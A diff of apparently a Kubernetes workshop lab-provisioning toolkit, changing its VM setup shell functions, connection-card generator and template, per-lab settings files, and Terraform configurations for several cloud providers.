terraform output -raw ips_txt > ../ips.txt
|
||||
echo "stage2_ok" > status
|
||||
}
|
||||
|
||||
_cmd standardize "Deal with non-standard Ubuntu cloud images"
|
||||
@@ -1040,19 +921,12 @@ _cmd_standardize() {
|
||||
# Disable unattended upgrades so that they don't mess up with the subsequent steps
|
||||
pssh sudo rm -f /etc/apt/apt.conf.d/50unattended-upgrades
|
||||
|
||||
# Some cloud providers think that it's smart to disable password authentication.
|
||||
# We need to re-neable it, though.
|
||||
# Digital Ocecan
|
||||
# Digital Ocean's cloud init disables password authentication; re-enable it.
|
||||
pssh "
|
||||
if [ -f /etc/ssh/sshd_config.d/50-cloud-init.conf ]; then
|
||||
sudo rm /etc/ssh/sshd_config.d/50-cloud-init.conf
|
||||
sudo systemctl restart ssh.service
|
||||
fi"
|
||||
# AWS
|
||||
pssh "if [ -f /etc/ssh/sshd_config.d/60-cloudimg-settings.conf ]; then
|
||||
sudo rm /etc/ssh/sshd_config.d/60-cloudimg-settings.conf
|
||||
sudo systemctl restart ssh.service
|
||||
fi"
|
||||
|
||||
# Special case for oracle since their iptables blocks everything but SSH
|
||||
pssh "
|
||||
@@ -1088,12 +962,11 @@ _cmd_tailhist () {
|
||||
# halfway through and we're actually trying to download it again.
|
||||
pssh "
|
||||
set -e
|
||||
sudo apt-get install unzip -y
|
||||
wget -c https://github.com/joewalnes/websocketd/releases/download/v0.3.0/websocketd-0.3.0-linux_$ARCH.zip
|
||||
unzip websocketd-0.3.0-linux_$ARCH.zip websocketd
|
||||
sudo mv websocketd /usr/local/bin/websocketd
|
||||
sudo mkdir -p /opt/tailhist
|
||||
sudo tee /opt/tailhist.service <<EOF
|
||||
sudo mkdir -p /tmp/tailhist
|
||||
sudo tee /root/tailhist.service <<EOF
|
||||
[Unit]
|
||||
Description=tailhist
|
||||
|
||||
@@ -1101,16 +974,16 @@ Description=tailhist
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/opt/tailhist
|
||||
WorkingDirectory=/tmp/tailhist
|
||||
ExecStart=/usr/local/bin/websocketd --port=1088 --staticdir=. sh -c \"tail -n +1 -f /home/$USER_LOGIN/.history || echo 'Could not read history file. Perhaps you need to \\\"chmod +r .history\\\"?'\"
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF
|
||||
sudo systemctl enable /opt/tailhist.service --now
|
||||
sudo systemctl enable /root/tailhist.service --now
|
||||
"
|
||||
|
||||
pssh -I sudo tee /opt/tailhist/index.html <lib/tailhist.html
|
||||
pssh -I sudo tee /tmp/tailhist/index.html <lib/tailhist.html
|
||||
}
|
||||
|
||||
_cmd tools "Install a bunch of useful tools (editors, git, jq...)"
|
||||
@@ -1183,8 +1056,8 @@ _cmd_tags() {
|
||||
cd tags
|
||||
echo "[#] [Status] [Tag] [Mode] [Provider]"
|
||||
for tag in *; do
|
||||
if [ -f $tag/logins.jsonl ]; then
|
||||
count="$(wc -l < $tag/logins.jsonl)"
|
||||
if [ -f $tag/ips.txt ]; then
|
||||
count="$(wc -l < $tag/ips.txt)"
|
||||
else
|
||||
count="?"
|
||||
fi
|
||||
@@ -1347,7 +1220,7 @@ EOF"
|
||||
_cmd www "Run a web server to access card HTML and PDF"
|
||||
_cmd_www() {
|
||||
cd www
|
||||
IPADDR=$(curl -fsSL canihazip.com/s || echo localhost)
|
||||
IPADDR=$(curl -sL canihazip.com/s)
|
||||
info "The following files are available:"
|
||||
for F in *; do
|
||||
echo "http://$IPADDR:8000/$F"
|
||||
|
||||
@@ -1,22 +1,32 @@
|
||||
#!/usr/bin/env python3
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
import jinja2
|
||||
|
||||
|
||||
# Read settings from user-provided settings file
|
||||
context = yaml.safe_load(open(sys.argv[1]))
|
||||
|
||||
context["logins"] = []
|
||||
for line in open("logins.jsonl"):
|
||||
if line.strip():
|
||||
context["logins"].append(json.loads(line))
|
||||
ips = list(open("ips.txt"))
|
||||
clustersize = context["clustersize"]
|
||||
|
||||
print("---------------------------------------------")
|
||||
print(" Number of cards: {}".format(len(context["logins"])))
|
||||
print(" Number of IPs: {}".format(len(ips)))
|
||||
print(" VMs per cluster: {}".format(clustersize))
|
||||
print("---------------------------------------------")
|
||||
|
||||
assert len(ips)%clustersize == 0
|
||||
|
||||
clusters = []
|
||||
|
||||
while ips:
|
||||
cluster = ips[:clustersize]
|
||||
ips = ips[clustersize:]
|
||||
clusters.append(cluster)
|
||||
|
||||
context["clusters"] = clusters
|
||||
|
||||
template_file_name = context["cards_template"]
|
||||
template_file_path = os.path.join(
|
||||
os.path.dirname(__file__),
|
||||
@@ -25,23 +35,23 @@ template_file_path = os.path.join(
|
||||
template_file_name
|
||||
)
|
||||
template = jinja2.Template(open(template_file_path).read())
|
||||
with open("cards.html", "w") as f:
|
||||
f.write(template.render(**context))
|
||||
print("Generated cards.html")
|
||||
with open("ips.html", "w") as f:
|
||||
f.write(template.render(**context))
|
||||
print("Generated ips.html")
|
||||
|
||||
|
||||
try:
|
||||
import pdfkit
|
||||
paper_size = context["paper_size"]
|
||||
margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
|
||||
with open("cards.html") as f:
|
||||
pdfkit.from_file(f, "cards.pdf", options={
|
||||
with open("ips.html") as f:
|
||||
pdfkit.from_file(f, "ips.pdf", options={
|
||||
"page-size": paper_size,
|
||||
"margin-top": margin,
|
||||
"margin-bottom": margin,
|
||||
"margin-left": margin,
|
||||
"margin-right": margin,
|
||||
})
|
||||
print("Generated cards.pdf")
|
||||
print("Generated ips.pdf")
|
||||
except ImportError:
|
||||
print("WARNING: could not import pdfkit; did not generate cards.pdf")
|
||||
print("WARNING: could not import pdfkit; did not generate ips.pdf")
|
||||
BIN
prepare-labs/lib/kubernetes-apt-key.gpg
Normal file
BIN
prepare-labs/lib/kubernetes-apt-key.gpg
Normal file
Binary file not shown.
@@ -17,12 +17,6 @@ pssh() {
|
||||
|
||||
echo "[parallel-ssh] $@"
|
||||
|
||||
# There are some routers that really struggle with the number of TCP
|
||||
# connections that we open when deploying large fleets of clusters.
|
||||
# We're adding a 1 second delay here, but this can be cranked up if
|
||||
# necessary - or down to zero, too.
|
||||
sleep ${PSSH_DELAY_PRE-1}
|
||||
|
||||
$(which pssh || which parallel-ssh) -h $HOSTFILE -l ubuntu \
|
||||
--par ${PSSH_PARALLEL_CONNECTIONS-100} \
|
||||
--timeout 300 \
|
||||
|
||||
@@ -1,16 +0,0 @@
|
||||
#!/bin/sh
|
||||
|
||||
DOMAINS=domains.txt
|
||||
IPS=ips.txt
|
||||
|
||||
. ./dns-cloudflare.sh
|
||||
|
||||
paste "$DOMAINS" "$IPS" | while read domain ips; do
|
||||
if ! [ "$domain" ]; then
|
||||
echo "⚠️ No more domains!"
|
||||
exit 1
|
||||
fi
|
||||
_clear_zone "$domain"
|
||||
_populate_zone "$domain" $ips
|
||||
done
|
||||
echo "✅ All done."
|
||||
@@ -1,6 +1,6 @@
|
||||
CLUSTERSIZE=3
|
||||
CLUSTERSIZE=1
|
||||
|
||||
CLUSTERPREFIX=polykube
|
||||
CLUSTERPREFIX=dmuc
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=training
|
||||
@@ -10,11 +10,12 @@ STEPS="
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
kubepkgs
|
||||
kubebins
|
||||
docker
|
||||
disabledocker
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubebins
|
||||
kubetools
|
||||
ips
|
||||
"
|
||||
@@ -1,26 +0,0 @@
|
||||
CLUSTERSIZE=1
|
||||
|
||||
CLUSTERPREFIX=monokube
|
||||
|
||||
# We're sticking to this in the first DMUC lab,
|
||||
# because it still works with Docker, and doesn't
|
||||
# require a ServiceAccount signing key.
|
||||
KUBEVERSION=1.19.11
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=training
|
||||
|
||||
STEPS="
|
||||
wait
|
||||
standardize
|
||||
clusterize
|
||||
tools
|
||||
docker
|
||||
disabledocker
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubebins
|
||||
kubetools
|
||||
ips
|
||||
"
|
||||
@@ -7,7 +7,7 @@ USER_PASSWORD=training
|
||||
|
||||
# For a list of old versions, check:
|
||||
# https://kubernetes.io/releases/patch-releases/#non-active-branch-history
|
||||
KUBEVERSION=1.28.9
|
||||
KUBEVERSION=1.22.5
|
||||
|
||||
STEPS="
|
||||
wait
|
||||
@@ -18,8 +18,7 @@ STEPS="
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubepkgs
|
||||
kubeadm
|
||||
kube
|
||||
kubetools
|
||||
kubetest
|
||||
"
|
||||
|
||||
@@ -14,8 +14,7 @@ STEPS="
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubepkgs
|
||||
kubeadm
|
||||
kube
|
||||
kubetools
|
||||
kubetest
|
||||
"
|
||||
"
|
||||
@@ -1,6 +0,0 @@
|
||||
CLUSTERSIZE=5
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=
|
||||
|
||||
STEPS="stage2"
|
||||
@@ -14,8 +14,7 @@ STEPS="
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubepkgs
|
||||
kubeadm
|
||||
kube
|
||||
kubetools
|
||||
kubetest
|
||||
"
|
||||
"
|
||||
@@ -15,8 +15,7 @@ STEPS="
|
||||
createuser
|
||||
webssh
|
||||
tailhist
|
||||
kubepkgs
|
||||
kubeadm
|
||||
kube
|
||||
kubetools
|
||||
kubetest
|
||||
"
|
||||
|
||||
@@ -1,3 +1,5 @@
|
||||
CLUSTERSIZE=2
|
||||
|
||||
USER_LOGIN=k8s
|
||||
USER_PASSWORD=
|
||||
|
||||
|
||||
@@ -1,8 +1,3 @@
|
||||
#export TF_VAR_node_size=GP2.4
|
||||
#export TF_VAR_node_size=g6-standard-6
|
||||
#export TF_VAR_node_size=m7i.xlarge
|
||||
|
||||
|
||||
CLUSTERSIZE=1
|
||||
|
||||
CLUSTERPREFIX=CHANGEME
|
||||
|
||||
@@ -7,7 +7,7 @@ STUDENTS=2
|
||||
#export TF_VAR_location=eu-north-1
|
||||
export TF_VAR_node_size=S
|
||||
|
||||
SETTINGS=admin-monokube
|
||||
SETTINGS=admin-dmuc
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./labctl create \
|
||||
--tag $TAG \
|
||||
@@ -15,7 +15,15 @@ TAG=$PREFIX-$SETTINGS
|
||||
--settings settings/$SETTINGS.env \
|
||||
--students $STUDENTS
|
||||
|
||||
SETTINGS=admin-polykube
|
||||
SETTINGS=admin-kubenet
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./labctl create \
|
||||
--tag $TAG \
|
||||
--provider $PROVIDER \
|
||||
--settings settings/$SETTINGS.env \
|
||||
--students $STUDENTS
|
||||
|
||||
SETTINGS=admin-kuberouter
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./labctl create \
|
||||
--tag $TAG \
|
||||
|
||||
@@ -7,7 +7,7 @@
|
||||
{%- set url = url
|
||||
| default("http://FIXME.container.training/") -%}
|
||||
{%- set pagesize = pagesize
|
||||
| default(10) -%}
|
||||
| default(9) -%}
|
||||
{%- set lang = lang
|
||||
| default("en") -%}
|
||||
{%- set event = event
|
||||
@@ -15,36 +15,79 @@
|
||||
{%- set backside = backside
|
||||
| default(False) -%}
|
||||
{%- set image = image
|
||||
| default(False) -%}
|
||||
| default("kube") -%}
|
||||
{%- set clusternumber = clusternumber
|
||||
| default(None) -%}
|
||||
{%- set thing = thing
|
||||
| default("lab environment") -%}
|
||||
|
||||
{%- if lang == "en" -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
{{ thing }} for this {{ event }}.
|
||||
You can connect to it with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- if qrcode == True -%}
|
||||
{%- set qrcode = "https://container.training/q" -%}
|
||||
{%- elif qrcode -%}
|
||||
{%- set qrcode = qrcode -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
{{ thing }} pour cette formation.
|
||||
Vous pouvez vous y connecter
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
|
||||
{# You can also set img_bottom_src instead. #}
|
||||
{%- set img_logo_src = {
|
||||
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
|
||||
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
|
||||
"kube": "https://avatars1.githubusercontent.com/u/13629408",
|
||||
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
|
||||
}[image] -%}
|
||||
{%- if lang == "en" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
machine for this {{ event }}.
|
||||
You can connect to this VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machine is:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
cluster for this {{ event }}.
|
||||
You can connect to each VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machines are:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
machine pour cette formation.
|
||||
Vous pouvez vous connecter à cette machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresse IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clusterprefix != "node" -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information for the
|
||||
<strong>{{ clusterprefix }}</strong> environment.
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
cluster pour cette formation.
|
||||
Vous pouvez vous connecter à chaque machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresses IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" -%}
|
||||
{%- set slides_are_at -%}
|
||||
You can find the slides at:
|
||||
{%- endset -%}
|
||||
{%- set slides_are_at -%}
|
||||
You can find the slides at:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" -%}
|
||||
{%- set slides_are_at -%}
|
||||
Le support de formation est à l'adresse suivante :
|
||||
{%- endset -%}
|
||||
{%- set slides_are_at -%}
|
||||
Le support de formation est à l'adresse suivante :
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
@@ -59,21 +102,25 @@
|
||||
}
|
||||
body {
|
||||
/* this is A4 minus 0.5cm margins */
|
||||
width: 20cm;
|
||||
height: 28.7cm;
|
||||
width: 20cm;
|
||||
height: 28.7cm;
|
||||
}
|
||||
{% elif paper_size == "Letter" %}
|
||||
@page {
|
||||
size: Letter; /* 8.5in x 11in */
|
||||
size: Letter;
|
||||
margin: 0.2in;
|
||||
}
|
||||
body {
|
||||
width: 6.75in; /* two cards wide */
|
||||
margin-left: 0.875in; /* (8.5in - 6.75in)/2 */
|
||||
margin-top: 0.1875in; /* (11in - 5 cards)/2 */
|
||||
/* this is Letter minus 0.2in margins */
|
||||
width: 8.6in;
|
||||
heigth: 10.6in;
|
||||
}
|
||||
{% endif %}
|
||||
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
@@ -87,45 +134,47 @@ table {
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
td:first-child {
|
||||
width: 10.5em;
|
||||
}
|
||||
|
||||
div.card {
|
||||
div {
|
||||
float: left;
|
||||
border: 0.01in dotted black;
|
||||
border: 1px dotted black;
|
||||
{% if backside %}
|
||||
height: 33%;
|
||||
{% endif %}
|
||||
/* columns * (width+left+right) < 100% */
|
||||
/*
|
||||
columns * (width+left+right) < 100%
|
||||
height: 33%;
|
||||
width: 24.8%;
|
||||
width: 33%;
|
||||
width: 24.8%;
|
||||
*/
|
||||
width: 3.355in; /* 3.375in minus two 0.01in borders */
|
||||
height: 2.105in; /* 2.125in minus two 0.01in borders */
|
||||
/**/
|
||||
width: 33%;
|
||||
/**/
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.8em;
|
||||
}
|
||||
|
||||
div.front {
|
||||
{% if image %}
|
||||
background-image: url("{{ image }}");
|
||||
background-repeat: no-repeat;
|
||||
background-size: 1in;
|
||||
background-position-x: 2.8in;
|
||||
background-position-y: center;
|
||||
{% endif %}
|
||||
div.back {
|
||||
border: 1px dotted grey;
|
||||
}
|
||||
|
||||
span.scale {
|
||||
white-space: nowrap;
|
||||
white-space: nowrap;
|
||||
}
|
||||
|
||||
img.logo {
|
||||
height: 4.5em;
|
||||
float: right;
|
||||
}
|
||||
|
||||
img.bottom {
|
||||
height: 2.5em;
|
||||
display: block;
|
||||
margin: 0.5em auto;
|
||||
}
|
||||
|
||||
.qrcode img {
|
||||
height: 5.8em;
|
||||
padding: 1em 1em 0.5em 1em;
|
||||
float: left;
|
||||
width: 40%;
|
||||
margin: 1em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
@@ -140,97 +189,101 @@ span.scale {
|
||||
height: 0;
|
||||
}
|
||||
</style>
|
||||
<script type="text/javascript" src="qrcode.min.js"></script>
|
||||
<script type="text/javascript" src="https://cdn.rawgit.com/davidshimjs/qrcodejs/gh-pages/qrcode.min.js"></script>
|
||||
<script type="text/javascript">
|
||||
function qrcodes() {
|
||||
[].forEach.call(
|
||||
document.getElementsByClassName("qrcode"),
|
||||
(e, index) => {
|
||||
new QRCode(e, {
|
||||
text: "{{ qrcode }}",
|
||||
correctLevel: QRCode.CorrectLevel.L
|
||||
});
|
||||
}
|
||||
);
|
||||
[].forEach.call(
|
||||
document.getElementsByClassName("qrcode"),
|
||||
(e, index) => {
|
||||
new QRCode(e, {
|
||||
text: "{{ qrcode }}",
|
||||
correctLevel: QRCode.CorrectLevel.L
|
||||
});
|
||||
}
|
||||
);
|
||||
}
|
||||
|
||||
function scale() {
|
||||
[].forEach.call(
|
||||
document.getElementsByClassName("scale"),
|
||||
(e, index) => {
|
||||
var text_width = e.getBoundingClientRect().width;
|
||||
var box_width = e.parentElement.getBoundingClientRect().width;
|
||||
var percent = 100 * box_width / text_width + "%";
|
||||
e.style.fontSize = percent;
|
||||
}
|
||||
);
|
||||
[].forEach.call(
|
||||
document.getElementsByClassName("scale"),
|
||||
(e, index) => {
|
||||
var text_width = e.getBoundingClientRect().width;
|
||||
var box_width = e.parentElement.getBoundingClientRect().width;
|
||||
var percent = 100 * box_width / text_width + "%";
|
||||
e.style.fontSize = percent;
|
||||
}
|
||||
);
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="qrcodes(); scale();">
|
||||
{% for login in logins %}
|
||||
<div class="card front">
|
||||
{% for cluster in clusters %}
|
||||
<div>
|
||||
<p>{{ intro }}</p>
|
||||
<p>
|
||||
{% if img_logo_src %}
|
||||
<img class="logo" src="{{ img_logo_src }}" />
|
||||
{% endif %}
|
||||
<table>
|
||||
<tr>
|
||||
<td>login:</td>
|
||||
<td>password:</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="logpass">{{ login.login }}</td>
|
||||
<td class="logpass">{{ login.password }}</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>IP address:</td>
|
||||
{% if login.port %}
|
||||
<td>port:</td>
|
||||
{% endif %}
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="logpass">{{ login.ipaddrs.split("\t")[0] }}</td>
|
||||
{% if login.port %}
|
||||
<td class="logpass">{{ login.port }}</td>
|
||||
{% endif %}
|
||||
</tr>
|
||||
{% if clusternumber != None %}
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
|
||||
{% endif %}
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">{{ user_login }}</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
{{ listhead }}
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr>
|
||||
<td>{{ clusterprefix }}{{ loop.index }}:</td>
|
||||
<td>{{ node }}</td>
|
||||
</tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
|
||||
<p>
|
||||
{% if url %}
|
||||
{{ slides_are_at }}
|
||||
{{ slides_are_at }}
|
||||
<p>
|
||||
<span class="scale">{{ url }}</span>
|
||||
</p>
|
||||
{% endif %}
|
||||
{% if img_bottom_src %}
|
||||
<img class="bottom" src="{{ img_bottom_src }}" />
|
||||
{% endif %}
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% if backside %}
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="card back">
|
||||
{{ backside }}
|
||||
{#
|
||||
<p>Thanks for attending
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during CONFERENCE in Month YYYY!</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team, in person or
|
||||
online, with custom courses of
|
||||
any length and any level.
|
||||
</p>
|
||||
{% if qrcode %}
|
||||
<p>If you're interested, please scan that QR code to contact me:</p>
|
||||
<span class="qrcode"></span>
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<p>Thanks for attending
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during CONFERENCE in Month YYYY!</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team, in person or
|
||||
online, with custom courses of
|
||||
any length and any level.
|
||||
</p>
|
||||
{% if qrcode %}
|
||||
<p>If you're interested, please scan that QR code to contact me:</p>
|
||||
<span class="qrcode"></span>
|
||||
{% else %}
|
||||
<p>If you're interested, you can contact me at:</p>
|
||||
{% endif %}
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
#}
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<p>If you're interested, you can contact me at:</p>
|
||||
{% endif %}
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
|
||||
@@ -1,19 +0,0 @@
|
||||
cards_template: cards.html
|
||||
paper_size: Letter
|
||||
url: https://2024-11-qconsf.container.training
|
||||
event: workshop
|
||||
backside: |
|
||||
<div class="qrcode"></div>
|
||||
<p>
|
||||
Thanks for attending the Asynchronous Architecture Patterns workshop at QCON!
|
||||
</p>
|
||||
<p>
|
||||
<b>This QR code will give you my contact info</b> as well as a link to a feedback form.
|
||||
</p>
|
||||
<p>
|
||||
If you liked this workshop, I can train your team, in person or online, with custom
|
||||
courses of any length and any level, on Docker, Kubernetes, and MLops.
|
||||
</p>
|
||||
qrcode: https://2024-11-qconsf.container.training/#contact
|
||||
thing: Kubernetes cluster
|
||||
image: logo-kubernetes.png
|
||||
@@ -1,2 +0,0 @@
|
||||
#!/bin/sh
|
||||
exo zone
|
||||
@@ -8,8 +8,8 @@ resource "random_string" "_" {
|
||||
resource "time_static" "_" {}
|
||||
|
||||
locals {
|
||||
min_nodes_per_pool = var.min_nodes_per_cluster
|
||||
max_nodes_per_pool = var.max_nodes_per_cluster
|
||||
min_nodes_per_pool = var.nodes_per_cluster
|
||||
max_nodes_per_pool = var.nodes_per_cluster * 2
|
||||
timestamp = formatdate("YYYY-MM-DD-hh-mm", time_static._.rfc3339)
|
||||
tag = random_string._.result
|
||||
# Common tags to be assigned to all resources
|
||||
|
||||
@@ -217,27 +217,16 @@ resource "kubernetes_certificate_signing_request_v1" "cluster_admin_${index}" {
|
||||
|
||||
%{ endfor ~}
|
||||
|
||||
output "ips_txt" {
|
||||
output "ip_addresses_of_nodes" {
|
||||
value = join("\n", [
|
||||
%{ for index, cluster in clusters ~}
|
||||
join("\n", concat(
|
||||
join("\t", concat(
|
||||
[
|
||||
random_string.shpod_${index}.result,
|
||||
"ssh -l k8s -p $${kubernetes_service.shpod_${index}.spec[0].port[0].node_port}"
|
||||
],
|
||||
split(" ", file("./externalips.${index}"))
|
||||
)),
|
||||
%{ endfor ~}
|
||||
""
|
||||
])
|
||||
}
|
||||
|
||||
output "logins_jsonl" {
|
||||
value = join("\n", [
|
||||
%{ for index, cluster in clusters ~}
|
||||
jsonencode({
|
||||
login = "k8s",
|
||||
password = random_string.shpod_${index}.result,
|
||||
port = kubernetes_service.shpod_${index}.spec[0].port[0].node_port,
|
||||
ipaddrs = replace(file("./externalips.${index}"), " ", "\t"),
|
||||
}),
|
||||
%{ endfor ~}
|
||||
""
|
||||
])
|
||||
}
|
||||
|
||||
@@ -7,16 +7,11 @@ variable "how_many_clusters" {
|
||||
default = 2
|
||||
}
|
||||
|
||||
variable "min_nodes_per_cluster" {
|
||||
variable "nodes_per_cluster" {
|
||||
type = number
|
||||
default = 2
|
||||
}
|
||||
|
||||
variable "max_nodes_per_cluster" {
|
||||
type = number
|
||||
default = 4
|
||||
}
|
||||
|
||||
variable "node_size" {
|
||||
type = string
|
||||
default = "M"
|
||||
|
||||
@@ -1,8 +1,7 @@
|
||||
terraform {
|
||||
required_providers {
|
||||
aws = {
|
||||
source = "hashicorp/aws"
|
||||
version = "~> 4.47.0"
|
||||
source = "hashicorp/aws"
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1 +0,0 @@
|
||||
../common.tf
|
||||
@@ -1 +0,0 @@
|
||||
../../providers/azure/config.tf
|
||||
@@ -1,22 +0,0 @@
|
||||
resource "azurerm_resource_group" "_" {
|
||||
name = var.cluster_name
|
||||
location = var.location
|
||||
}
|
||||
|
||||
resource "azurerm_kubernetes_cluster" "_" {
|
||||
name = var.cluster_name
|
||||
location = var.location
|
||||
dns_prefix = var.cluster_name
|
||||
identity {
|
||||
type = "SystemAssigned"
|
||||
}
|
||||
resource_group_name = azurerm_resource_group._.name
|
||||
default_node_pool {
|
||||
name = "x86"
|
||||
node_count = var.min_nodes_per_pool
|
||||
min_count = var.min_nodes_per_pool
|
||||
max_count = var.max_nodes_per_pool
|
||||
vm_size = local.node_size
|
||||
enable_auto_scaling = true
|
||||
}
|
||||
}
|
||||
@@ -1,12 +0,0 @@
|
||||
output "cluster_id" {
|
||||
value = azurerm_kubernetes_cluster._.id
|
||||
}
|
||||
|
||||
output "has_metrics_server" {
|
||||
value = true
|
||||
}
|
||||
|
||||
output "kubeconfig" {
|
||||
value = azurerm_kubernetes_cluster._.kube_config_raw
|
||||
sensitive = true
|
||||
}
|
||||
@@ -1,7 +0,0 @@
|
||||
terraform {
|
||||
required_providers {
|
||||
azurerm = {
|
||||
source = "hashicorp/azurerm"
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1 +0,0 @@
|
||||
../../providers/azure/variables.tf
|
||||
@@ -11,23 +11,17 @@ data "oci_containerengine_cluster_option" "_" {
|
||||
locals {
|
||||
compartment_id = oci_identity_compartment._.id
|
||||
kubernetes_version = data.oci_containerengine_cluster_option._.kubernetes_versions[0]
|
||||
images = [
|
||||
for image in data.oci_containerengine_node_pool_option._.sources : image
|
||||
if can(regex("OKE", image.source_name))
|
||||
&& can(regex(substr(local.kubernetes_version, 1, -1), image.source_name))
|
||||
&& !can(regex("GPU", image.source_name))
|
||||
&& !can(regex("aarch64", image.source_name))
|
||||
]
|
||||
|
||||
}
|
||||
|
||||
data "oci_identity_availability_domains" "_" {
|
||||
compartment_id = local.compartment_id
|
||||
}
|
||||
|
||||
data "oci_containerengine_node_pool_option" "_" {
|
||||
compartment_id = local.compartment_id
|
||||
node_pool_option_id = oci_containerengine_cluster._.id
|
||||
data "oci_core_images" "_" {
|
||||
compartment_id = local.compartment_id
|
||||
operating_system = "Oracle Linux"
|
||||
operating_system_version = "8"
|
||||
shape = local.shape
|
||||
}
|
||||
|
||||
resource "oci_containerengine_cluster" "_" {
|
||||
@@ -62,7 +56,7 @@ resource "oci_containerengine_node_pool" "_" {
|
||||
}
|
||||
}
|
||||
node_source_details {
|
||||
image_id = local.images[0].image_id
|
||||
image_id = data.oci_core_images._.images[0].id
|
||||
source_type = "image"
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1 +0,0 @@
|
||||
../common.tf
|
||||
@@ -1 +0,0 @@
|
||||
../../providers/ovh/config.tf
|
||||
@@ -1,18 +0,0 @@
|
||||
resource "ovh_cloud_project_kube" "_" {
|
||||
name = var.cluster_name
|
||||
region = var.location
|
||||
version = local.k8s_version
|
||||
}
|
||||
|
||||
resource "ovh_cloud_project_kube_nodepool" "_" {
|
||||
kube_id = ovh_cloud_project_kube._.id
|
||||
name = "x86"
|
||||
flavor_name = local.node_size
|
||||
desired_nodes = var.min_nodes_per_pool
|
||||
min_nodes = var.min_nodes_per_pool
